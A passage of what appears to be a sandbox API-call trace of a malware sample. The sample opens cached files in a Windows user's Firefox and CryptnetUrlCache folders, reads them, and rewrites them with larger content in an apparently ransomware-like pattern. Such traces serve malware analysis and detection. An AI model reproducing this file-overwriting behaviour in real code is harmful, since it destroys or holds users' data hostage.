lpUsedDefaultChar=0x0 | out: lpMultiByteStr="test-malware-simple.pset", lpUsedDefaultChar=0x0) returned 24 [0182.526] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f733c8, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f733c8*, lpNumberOfBytesRead=0x2e9f2bc*=0x10, lpOverlapped=0x0) returned 1 [0182.527] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0182.527] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x598, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x598, lpOverlapped=0x0) returned 1 [0182.527] CloseHandle (hObject=0x1cc) returned 1 [0182.527] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0182.529] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0182.529] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1c362 [0182.529] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0182.529] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0182.529] ReleaseMutex (hMutex=0x168) returned 1 [0182.529] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ce8c0453589216a67cddb50284fbfe8d.png", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0182.529] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ce8c0453589216a67cddb50284fbfe8d.png", cchWideChar=36, lpMultiByteStr=0x1fa54dc, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ce8c0453589216a67cddb50284fbfe8d.png", lpUsedDefaultChar=0x0) returned 36 [0182.529] ReadFile (in: hFile=0x1cc, lpBuffer=0x28fc2d8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x28fc2d8*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0182.531] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1b362 [0182.531] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0182.532] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1b362 [0182.533] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebfe08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebfe08*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0182.533] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0182.533] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0182.533] CloseHandle (hObject=0x1cc) returned 1 [0182.533] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\23b523c9e7746f715d33c6527c18eb9d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0182.534] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0182.534] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x145 [0182.534] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0182.534] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0182.534] ReleaseMutex (hMutex=0x168) returned 1 [0182.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="23B523C9E7746F715D33C6527C18EB9D", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0182.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="23B523C9E7746F715D33C6527C18EB9D", cchWideChar=32, lpMultiByteStr=0x1fa54dc, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="23B523C9E7746F715D33C6527C18EB9D", lpUsedDefaultChar=0x0) returned 32 [0182.534] ReadFile (in: hFile=0x1cc, lpBuffer=0x2851538, nNumberOfBytesToRead=0x145, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2851538*, lpNumberOfBytesRead=0x2e9f2bc*=0x145, lpOverlapped=0x0) returned 1 [0182.535] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0182.535] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a56c8*, nNumberOfBytesToWrite=0x6cd, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a56c8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x6cd, lpOverlapped=0x0) returned 1 [0182.536] CloseHandle (hObject=0x1cc) returned 1 [0182.536] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0182.537] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0182.537] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1d7 [0182.537] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0182.537] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0182.537] ReleaseMutex (hMutex=0x168) returned 1 [0182.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0182.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", cchWideChar=65, lpMultiByteStr=0x1faca24, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", lpUsedDefaultChar=0x0) returned 65 [0182.537] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f5cf28, nNumberOfBytesToRead=0x1d7, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f5cf28*, lpNumberOfBytesRead=0x2e9f2bc*=0x1d7, lpOverlapped=0x0) returned 1 [0182.538] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0182.538] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a56c8*, nNumberOfBytesToWrite=0x75f, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a56c8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x75f, lpOverlapped=0x0) returned 1 [0182.538] CloseHandle (hObject=0x1cc) returned 1 [0182.539] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0182.539] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0182.539] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x6e3 [0182.539] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0182.540] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0182.540] ReleaseMutex (hMutex=0x168) returned 1 [0182.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0182.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", cchWideChar=65, lpMultiByteStr=0x1faca24, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpUsedDefaultChar=0x0) returned 65 [0182.540] ReadFile (in: hFile=0x1cc, lpBuffer=0x28fc2f8, nNumberOfBytesToRead=0x6e3, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x28fc2f8*, lpNumberOfBytesRead=0x2e9f2bc*=0x6e3, lpOverlapped=0x0) returned 1 [0183.556] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0183.556] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0xc6b, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2e9f2d0*=0xc6b, lpOverlapped=0x0) returned 1 [0183.556] CloseHandle (hObject=0x1cc) returned 1 [0183.557] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0183.558] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0183.558] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1cf [0183.558] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0183.558] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0183.559] ReleaseMutex (hMutex=0x168) returned 1 [0183.559] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0183.559] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", cchWideChar=65, lpMultiByteStr=0x1faca24, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpUsedDefaultChar=0x0) returned 65 [0183.559] ReadFile (in: hFile=0x1cc, lpBuffer=0x26dd2c8, nNumberOfBytesToRead=0x1cf, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26dd2c8*, lpNumberOfBytesRead=0x2e9f2bc*=0x1cf, lpOverlapped=0x0) returned 1 [0183.560] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0183.560] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a76f8*, nNumberOfBytesToWrite=0x757, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a76f8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x757, lpOverlapped=0x0) returned 1 [0183.561] CloseHandle (hObject=0x1cc) returned 1 [0183.561] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0183.562] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0183.562] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x5e0 [0183.562] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0183.562] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0183.563] ReleaseMutex (hMutex=0x168) returned 1 [0183.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0183.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", cchWideChar=65, lpMultiByteStr=0x1faca24, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpUsedDefaultChar=0x0) returned 65 [0183.563] ReadFile (in: hFile=0x1cc, lpBuffer=0x26cf6b8, nNumberOfBytesToRead=0x5e0, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesRead=0x2e9f2bc*=0x5e0, lpOverlapped=0x0) returned 1 [0183.565] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0183.565] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0xb68, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2e9f2d0*=0xb68, lpOverlapped=0x0) returned 1 [0183.565] CloseHandle (hObject=0x1cc) returned 1 [0183.565] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0183.566] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0183.566] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x5ed [0183.566] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0183.566] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0183.567] ReleaseMutex (hMutex=0x168) returned 1 [0183.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0183.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", cchWideChar=65, lpMultiByteStr=0x1faca24, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpUsedDefaultChar=0x0) returned 65 [0183.567] ReadFile (in: hFile=0x1cc, lpBuffer=0x26cf6b8, nNumberOfBytesToRead=0x5ed, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesRead=0x2e9f2bc*=0x5ed, lpOverlapped=0x0) returned 1 [0183.569] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0183.569] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0xb75, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2e9f2d0*=0xb75, lpOverlapped=0x0) returned 1 [0183.569] CloseHandle (hObject=0x1cc) returned 1 [0183.569] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0183.570] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0183.570] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x64b [0183.570] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0183.570] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0183.570] ReleaseMutex (hMutex=0x168) returned 1 [0183.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0183.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", cchWideChar=65, lpMultiByteStr=0x1faca24, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", lpUsedDefaultChar=0x0) returned 65 [0183.571] ReadFile (in: hFile=0x1cc, lpBuffer=0x26cf6b8, nNumberOfBytesToRead=0x64b, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesRead=0x2e9f2bc*=0x64b, lpOverlapped=0x0) returned 1 [0183.573] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0183.573] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0xbd3, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2e9f2d0*=0xbd3, lpOverlapped=0x0) returned 1 [0183.573] CloseHandle (hObject=0x1cc) returned 1 [0183.573] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3130b1871a126520a8c47861efe3ed4d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0183.574] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0183.574] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xdc [0183.574] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0183.574] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0183.574] ReleaseMutex (hMutex=0x168) returned 1 [0183.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="3130B1871A126520A8C47861EFE3ED4D", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0183.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="3130B1871A126520A8C47861EFE3ED4D", cchWideChar=32, lpMultiByteStr=0x1fa54dc, cbMultiByte=32, lpDefaultChar=0x0, 